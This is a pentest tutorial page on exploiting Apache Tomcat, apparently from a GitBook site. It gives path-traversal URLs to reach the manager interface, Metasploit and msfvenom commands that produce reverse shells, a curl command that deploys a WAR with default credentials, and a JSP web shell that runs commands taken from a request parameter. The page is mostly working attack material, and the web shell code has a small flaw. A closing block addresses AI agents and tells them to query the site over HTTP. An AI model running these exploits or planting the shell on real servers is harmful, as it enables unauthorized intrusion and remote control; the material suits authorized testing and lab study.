# Exploitation #### Topics > 1. [Lab Setup & Configuration](/home/common-services-pentest/web-services-80-443-8080/tomcat/lab-setup-and-configuration.md) > 2. [Enumeration](/home/common-services-pentest/web-services-80-443-8080/tomcat/enumeration.md) > 3. [Exploitation](/home/common-services-pentest/web-services-80-443-8080/tomcat/exploitation.md) > 4. [Mitigation & Hardening](/home/common-services-pentest/web-services-80-443-8080/tomcat/mitigation-and-hardening.md) ## **Common Vulnerabilities** 1. **Password Backtrace Disclosure**\ Visiting **/auth.jsp** might reveal passwords in backtraces. 2. **Double URL Encoding**\ Vulnerabilities like CVE-2007-1860 allow management interface access via: ```url pathTomcat/%252E%252E/manager/html ``` 3. **Insecure Example Scripts**\ Apache Tomcat versions 4.x–7.x include examples susceptible to XSS or information disclosure. Examples: * `/examples/jsp/num/numguess.jsp` * `/examples/servlet/HelloWorldExample`\ Check and restrict access to these paths. 4. **Path Traversal**\ Exploit path traversal with: ```url /lalala/..;/manager/html ``` or ```url http:///;param=value/manager/html ``` *** ## **Using Metasploit Framework** Leverage the `tomcat_mgr_upload` exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands: ```bash msfconsole -q search tomcat_mgr_upload use 3 set rhosts set rport 8080 set httpusername admin set httppassword password set payload linux/x86/meterpreter_reverse_tcp exploit ``` After exploitation, a reverse shell is obtained, allowing command execution via the `meterpreter` shell. *** **Remote Code Execution (RCE)** If you gain access to the **/manager/html** interface, you can upload and deploy a `.war` file to achieve RCE. * Example: ```bash curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell" ``` Metasploit can automate this: ```bash use exploit/multi/http/tomcat_mgr_upload ``` To create a reverse shell WAR file: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o shell.war ``` *** ## **Other Methods** 1. **TomcatWarDeployer**\ Deploy shells or bind shells via: ```bash ./tomcatWarDeployer.py -U -P -H -p :/manager/html/ ``` 2. **Clusterd**\ Automate testing: ```bash clusterd.py -i -a tomcat -v 5.5 --gen-payload :4444 --deploy shell.war ``` 3. **Manual Web Shell**\ Example JSP for command execution: ```bash <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } %>

<%=output %>

``` Package it into a WAR file and upload it. *** ## **Other Tools** * [Apache Tomcat Scanner](https://github.com/p0dalirius/ApacheTomcatScanner) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dev-angelist.gitbook.io/home/common-services-pentest/web-services-80-443-8080/tomcat/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.